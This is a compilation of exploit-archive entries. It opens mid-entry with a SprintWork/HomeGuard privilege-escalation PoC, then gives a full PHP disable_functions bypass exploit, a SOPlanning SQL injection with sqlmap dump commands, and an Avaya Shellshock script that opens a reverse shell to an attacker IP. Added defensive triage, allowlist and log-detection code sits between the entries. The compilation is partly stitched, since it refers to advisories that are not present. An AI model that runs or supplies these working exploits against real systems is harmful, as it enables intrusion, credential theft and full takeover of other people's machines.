# Software Link: https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe
# Version: 2.3.1
# Tested On: Windows 10 (32-bit)
# Vulnerability Overview:
# SprintWork v2.3.1 (x86) suffers from insecure file, service and folder permissions, unquoted service paths,
# and a missing executable for one of the two services it installs to run as 'LocalSystem'.
# This allows any local user to gain persistent code execution as 'LocalSystem'.
# Both the 32-bit and 64-bit builds of SprintWork v2.3.1 create the services 'SP52 AMC' and 'SprintWork TM VI',
# with "StartMode" set to 'Auto', to run as 'LocalSystem'; these services run every time the computer starts.
# The 'SP52 AMC' service is set to use the 'nvlsimw.exe' file. On the 32-bit version the 'nvlsimw.exe' file is
# never created. This, in combination with its other vulnerabilities, results in persistent code execution for
# any local user as 'LocalSystem'.
# See Proof of Concept below for full details.
# About:
# "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity
# + Block or time restrict social networks, online games or any website
#   - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time.
# + Block or time restrict games and programs
#   - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day.
# + Detailed activity monitoring and reporting
#   - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits.
# + Selective user monitoring and blocking.
#   - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers.
# + Wildcard support
#   - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain.
# + Multiple website blocking lists.
#   - Block or set time restrictions collectively for groups of websites.
# + Cannot be bypassed, deleted or disabled.
#   - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password."
# - https://veridium.net/sprintwork/

## Service Information (there is also an Unquoted Service Path)
C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork
SP52 AMC          C:\Program Files\SprintWork\nvlsimw.exe  Auto  LocalSystem
SprintWork TM VI  C:\Program Files\SprintWork\nvlsim.exe   Auto  LocalSystem

## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service
C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe"
11/23/2019  10:20 PM         1,345,536 NVLSIM.EXE
12/25/2019  02:47 PM         1,202,688 qcden.exe
12/25/2019  02:47 PM        14,436,864 SprintWork.exe
11/23/2019  10:20 PM         1,557,504 txew.exe

## Insecure Folder Permission
C:\>icacls "C:\Program Files\SprintWork"
C:\Program Files\SprintWork BUILTIN\Users:(F)
                            BUILTIN\Users:(OI)(CI)(IO)(F)

## Insecure File/Service Permission
C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE"
C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F)

## Local Privilege Escalation Proof of Concept
#0. Download & install SprintWork v2.3.1 (x86) on a Windows 10 32-bit operating system
#1. Create a low-privileged user
C:\Windows\system32>net user lowpriv password /add
#2. Change to the lowpriv user
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name                    lowPrivUser
Local Group Memberships      *Users
Global Group memberships     *None
C:\>whoami
mycomputer\lowprivuser
#3. Create the malicious binary on Kali Linux
   3.1) Download dependencies
   root@kali# apt install gcc-mingw-w64-i686 wine64 -y
   3.2) Create the add-admin-user C code
   root@kali# cat addAdmin.c
   #include <windows.h>
   #include <stdlib.h>
   int main(void) {
       /* runs as SYSTEM when the 'SP52 AMC' service starts: create a user and make it an Administrator */
       system("net user adminpriv mypassword /add");
       system("net localgroup Administrators adminpriv /add");
       return 0;
   }
   3.3) Compile the code
   root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe
#4. Transfer the created 'nvlsimw.exe' to the Windows host
#5. Move the created 'nvlsimw.exe' binary into the 'C:\Program Files\SprintWork\' directory
C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\"
        1 file(s) moved.
C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim
11/23/2019  10:20 PM         1,345,536 NVLSIM.EXE
02/13/2020  06:07 PM           288,469 nvlsimw.exe
#6. Verify the members of the local group 'Administrators'
C:\Users\lowpriv>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
boku
#7. Reboot the computer
C:\Users\lowpriv>shutdown /r /t 0
#8. Verify that user 'adminpriv' was created & added to the local group 'Administrators'
C:\>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
adminpriv
boku
C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group
User name                    adminpriv
Account active               Yes
Password last set            2/13/2020 6:18:03 PM
Password expires             Never
Password changeable          2/13/2020 6:18:03 PM
Password required            Yes
Local Group Memberships      *Administrators      *Users
Global Group memberships     *None
-
HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
# Version: 9.3.1
# Tested On: Windows 10 (32-bit)
# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions

## Service Information (Unquoted Service Path)
C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
Name         PathName                                    StartMode  StartName
HG52 AM VI   C:\Program Files\HomeGuard Pro\vglset.exe   Auto       LocalSystem
HG52 AMC     C:\Program Files\HomeGuard Pro\vglsetw.exe  Auto       LocalSystem
HG52 AM REM  C:\Program Files\HomeGuard Pro\vglrem.exe   Auto       LocalSystem
HG52 AM SRV  C:\Program Files\HomeGuard Pro\vglserv.exe  Auto       LocalSystem

## Insecure Folder Permission
C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)

## Insecure File/Service Permission
C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)
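The OpenTFTP, EPSON, SprintWork and HomeGuard advisories above all rest on the same three checks: an auto-start service running as LocalSystem, an unquoted binary path with spaces, and a binary or folder that low-privilege principals can write to (SprintWork adds a fourth: the service binary does not exist at all). The following is an added example, not the advisory author's code: a Python triage that parses the `wmic service get` and `icacls` listings quoted above, enumerates the files CreateProcess tries for an unquoted path, and reports which services are exposed. The sample inputs are constructed from the listings on this page, and the parser assumes wmic's default table output, in which columns are padded with two or more spaces.

```python
import re

# Principals every local user belongs to; write rights for them on a service binary
# or its folder let any user plant code that runs as the service account.
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
                       "Everyone", "NT AUTHORITY\\INTERACTIVE"}
WRITE_RIGHTS = {"F", "M", "W", "C", "D", "WD", "AD", "WA", "DC"}  # C = change, as printed above
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I", "ID"}
# One icacls line: optional path, a principal, then "(flag)(flag)RIGHT" groups.
ACE_RE = re.compile(
    r"^(?P<path>.*?)\s*"
    r"(?P<principal>(?:NT AUTHORITY|BUILTIN|NT SERVICE|CREATOR OWNER|Everyone|[A-Za-z0-9_.-]+)"
    r"(?:\\[A-Za-z0-9 _.-]+)?):"
    r"(?P<perms>(?:\([A-Z]+\)|[A-Z]+)+)$")


def parse_wmic_services(text):
    """Rows of 'wmic service get Name,PathName,StartMode,StartName'; wmic pads its
    columns with two or more spaces, which is what the split relies on (assumption)."""
    lines = [l for l in text.strip().splitlines() if l.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    return [dict(zip(header, re.split(r"\s{2,}", l.strip()))) for l in lines[1:]]


def service_exe(pathname):
    """Executable path from a PathName, honouring quotes when present."""
    p = pathname.strip()
    return p[1:].split('"', 1)[0] if p.startswith('"') else p


def hijack_candidates(pathname):
    """Unquoted path with spaces: the files CreateProcess tries, in order, before
    the real one (the unquoted-service-path abuse)."""
    p = pathname.strip()
    if p.startswith('"') or " " not in p:
        return []
    parts = p.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def parse_icacls(text):
    """[(path, principal, {rights})]; continuation lines reuse the previous path."""
    aces, current = [], None
    for line in text.splitlines():
        m = ACE_RE.match(line.rstrip())
        if not m:                      # blank line or "Successfully processed ..." summary
            continue
        if m.group("path").strip():
            current = m.group("path").strip()
        tokens = [a or b for a, b in re.findall(r"\(([A-Z]+)\)|([A-Z]+)", m.group("perms"))]
        aces.append((current, m.group("principal"), set(tokens) - INHERITANCE_FLAGS))
    return aces


def low_priv_writable(aces):
    """{lower-cased path: sorted [(principal, right)]} for low-privilege write grants."""
    out = {}
    for path, principal, rights in aces:
        if principal in LOW_PRIV_PRINCIPALS:
            for right in rights & WRITE_RIGHTS:
                out.setdefault(path.lower(), set()).add((principal, right))
    return {path: sorted(grants) for path, grants in out.items()}


def triage(services, aces, existing_files=None):
    """Per-service findings for the conditions the advisories above rely on:
    unquoted path, low-privilege-writable binary or folder, missing binary."""
    writable = low_priv_writable(aces)
    existing = None if existing_files is None else {f.lower() for f in existing_files}
    report = {}
    for svc in services:
        exe = service_exe(svc["PathName"])
        folder = exe.rsplit("\\", 1)[0]
        findings = []
        if hijack_candidates(svc["PathName"]):
            findings.append("unquoted path; tries " + ", ".join(hijack_candidates(svc["PathName"])))
        for label, key in (("binary", exe.lower()), ("folder", folder.lower())):
            if key in writable:
                findings.append(label + " writable by " + "; ".join(f"{p} ({r})" for p, r in writable[key]))
        if existing is not None and exe.lower() not in existing:
            findings.append(f"binary missing; anything planted at {exe} runs as {svc['StartName']}")
        report[svc["Name"]] = findings
    return report


# Constructed from the listings on this page.
WMIC_SAMPLE = r"""
Name              PathName                                                                            StartMode  StartName
HG52 AM VI        C:\Program Files\HomeGuard Pro\vglset.exe                                           Auto       LocalSystem
SP52 AMC          C:\Program Files\SprintWork\nvlsimw.exe                                             Auto       LocalSystem
SprintWork TM VI  C:\Program Files\SprintWork\nvlsim.exe                                              Auto       LocalSystem
TFTPServer        C:\OpenTFTPServer\OpenTFTPServerSP.exe                                              Auto       LocalSystem
EMP_NSWLSV        C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe  Auto       LocalSystem
"""
ICACLS_SAMPLE = r"""
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
                  BUILTIN\Users:(OI)(CI)(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(I)(M)
C:\Program Files\SprintWork BUILTIN\Users:(F)
                            BUILTIN\Users:(OI)(CI)(IO)(F)
C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)

Successfully processed 5 files; Failed processing 0 files
"""
# Files present on disk per the dir listings above (nvlsimw.exe is absent on the 32-bit build).
EXISTING_FILES = {r"C:\Program Files\SprintWork\NVLSIM.EXE", r"C:\Program Files\HomeGuard Pro\vglset.exe",
                  r"C:\OpenTFTPServer\OpenTFTPServerSP.exe",
                  r"C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe"}

if __name__ == "__main__":
    for name, found in triage(parse_wmic_services(WMIC_SAMPLE), parse_icacls(ICACLS_SAMPLE), EXISTING_FILES).items():
        print(name, "->", found or ["nothing found"])
```

An unquoted path on its own is only a finding, not an escalation: the EPSON entry produces hijack candidates under C:\ and C:\Program Files (x86)\, which standard users cannot write to, so the triage reports it without a writable binary or folder. The SprintWork and HomeGuard rows show the combination that the PoCs above actually exploit.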
-
PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass
<?php

# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=76047
# debug_backtrace() returns a reference to a variable
# that has been destroyed, causing a UAF vulnerability.
#
# This exploit should work on all PHP 7.0-7.4 versions
# released as of 30/01/2020.
#
# Author: https://github.com/mm0r1

pwn("uname -a");

function pwn($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() {
            global $backtrace;
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {
        # str_shuffle prevents opcache string interning
        $arg = str_shuffle(str_repeat('A', 79));
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if UAF fails
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle(str_repeat('A', 79));

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);

    exit();
}
-
SOPlanning 1.45 - 'by' SQL Injection
# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling

# The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page:

# POC:
# The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table.

# Capture the request in Burpsuite:

GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC
Connection: close
Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D
Upgrade-Insecure-Requests: 1

# Feed the request into SQLMap:

sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump

Then you will be able to see the information for the users in the database:

root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
___ __H__ ___ ___[(]_____ ___ ___ {1.4.1.2#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:13:27 /2020-02-14/

[11:13:27] [INFO] parsing HTTP request from 'projects.req'
[11:13:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: by (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
    Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END))

    Type: time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1)
---

Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.
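An added example, not code from J3rryBl4nks' advisory or from SOPlanning: the injection sits in an ORDER BY clause, which no database driver can parameterize, so the fix is an allowlist of column names and directions. The table, columns and rows are constructed stand-ins for the demo, and the probe reproduces the shape of the boolean-based payload sqlmap reported, run here against SQLite instead of MySQL.

```python
import sqlite3

# Sortable columns and the only two directions the application needs.
ALLOWED_ORDER = {"nom_createur", "charge", "titre"}
ALLOWED_BY = {"ASC", "DESC"}


def build_db():
    """In-memory stand-in for the projects table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE projets (titre TEXT, nom_createur TEXT, charge INTEGER)")
    conn.executemany("INSERT INTO projets VALUES (?, ?, ?)",
                     [("alpha", "bob", 3), ("beta", "alice", 1), ("gamma", "carol", 2)])
    conn.commit()
    return conn


def vulnerable_query(conn, order, by):
    """Mirrors the flaw: both sort values are pasted into the SQL text, so
    anything appended to 'ASC' becomes another ORDER BY term."""
    sql = "SELECT titre FROM projets ORDER BY %s %s" % (order, by)
    return [row[0] for row in conn.execute(sql)]


def hardened_query(conn, order, by):
    """ORDER BY cannot take bound parameters, so allowlist both values and
    reject anything else instead of trying to escape it."""
    if order not in ALLOWED_ORDER:
        raise ValueError("unsupported sort column: %r" % order)
    by = by.upper()
    if by not in ALLOWED_BY:
        raise ValueError("unsupported sort direction: %r" % by)
    sql = "SELECT titre FROM projets ORDER BY %s %s" % (order, by)
    return [row[0] for row in conn.execute(sql)]


def probe(cond):
    """Boolean probe shaped like sqlmap's finding above: a true condition
    sorts normally, a false one evaluates an expression SQLite rejects
    (abs() of the minimum 64-bit integer raises 'integer overflow')."""
    return ("ASC,(SELECT CASE WHEN (%s) THEN 1 "
            "ELSE abs(-9223372036854775807-1) END)" % cond)


def probe_outcome(conn, query_fn, cond):
    """'ok' or 'error' means the injected expression reached the database
    and its outcome depends on cond, i.e. a blind oracle exists;
    'rejected' means validation stopped it before any SQL ran."""
    try:
        query_fn(conn, "nom_createur", probe(cond))
        return "ok"
    except sqlite3.DatabaseError:
        return "error"
    except ValueError:
        return "rejected"
```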
-
Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Author: Sarang Tumne a.k.a SarT
# Date: 2020-02-14
# Confirmed on release 5.2
# Vendor: https://www.avaya.com/en/
# Avaya's advisory:
# https://downloads.avaya.com/css/P8/documents/100183151
# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
###############################################

#!/usr/bin/python
import sys
import requests

if len(sys.argv) < 4:
    print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
    print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
    print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
    print "[*] Netcat Listener: nc -lvvnp <port>"
    print "\n"
    sys.exit()

#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()

CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]

http_headers = {
    "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
}

def main():
    if len(sys.argv) == 4:
        print "[+] Success, spawning a shell on your custom port :)..."
        requests.get(url, headers=http_headers, verify=False, timeout=5)
    else:
        print "[-] Something went wrong, quitting..."
        sys.exit()

if __name__ == "__main__":
    main()
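An added detection example, not part of the advisory above: the exploit works because a CGI endpoint exports the User-Agent header into bash's environment, so the "() {" function prologue in a request header or URL is the signature to hunt for in web logs. The log lines are constructed samples in an assumed combined-log layout; the field layout is the only assumption, adjust it to your server's format.

```python
import re
from urllib.parse import unquote

# Bash's exported-function prologue, "() {" with optional whitespace: the
# prefix a CGI-delivered Shellshock payload must carry in the header that
# becomes an HTTP_* environment variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined-log layout (assumed): ip ident user [ts] "request" status size
# "referer" "user-agent". Quoted fields may contain backslash-escaped quotes.
Q = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + Q + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + Q + r')" "(?P<ua>' + Q + r')"$')

# Constructed sample lines; only the second, third and fourth are malicious.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Feb/2020:10:01:02 +0000] "GET /mt/mt.cgi HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"',
    '10.0.0.9 - - [14/Feb/2020:10:01:07 +0000] "GET /mt/mt.cgi HTTP/1.1" 200 0 '
    '"-" "() { :;}; echo vulnerable"',
    '10.0.0.9 - - [14/Feb/2020:10:01:08 +0000] "GET /mt/mt.cgi HTTP/1.1" 200 0 '
    '"-" "() { test;}; echo \\"Content-type: text/plain\\"; echo"',
    '10.0.0.9 - - [14/Feb/2020:10:01:09 +0000] '
    '"GET /mt/mt.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B HTTP/1.1" 404 0 "-" "curl/7.64.0"',
    '10.0.0.7 - - [14/Feb/2020:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 120 '
    '"-" "Mozilla/5.0 (Windows NT 10.0) {test}"',
]


def is_shellshock(value):
    """True when a header or URL value carries the bash function prefix,
    checked raw and after percent-decoding (query strings arrive encoded)."""
    return bool(SHELLSHOCK_RE.search(value) or SHELLSHOCK_RE.search(unquote(value)))


def find_shellshock(lines):
    """Return (line_no, client_ip, request_line) for every line whose
    User-Agent, Referer or request line carries the prefix; those are the
    fields a CGI server copies into the environment of the script."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: surface separately in practice
        if any(is_shellshock(m.group(f)) for f in ("ua", "referer", "req")):
            hits.append((n, m.group("ip"), m.group("req")))
    return hits
```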
-
WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting
# Date: 2020-01-23
# Vendor Homepage: https://strongtestimonials.com
# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 2.40.0 and below
# CVE : CVE-2020-8549

# 1. Description
# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with
# over 90,000 active installations. In the client details section which is seen when adding
# or editing a testimonial, the custom[client_name] and custom[company_name] parameters
# were found to be vulnerable to stored cross-site scripting. All WordPress websites
# using Strong Testimonials version 2.40.0 and below are affected.

2. Proof of Concept
When the testimonial is added to a page on the site, the XSS payload passed in both of the above-mentioned vulnerable parameters gets executed. The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.

POST /wp-admin/post.php HTTP/1.1
Host: testing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1402
Origin: http://testing.com
Connection: close
Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg
Upgrade-Insecure-Requests: 1

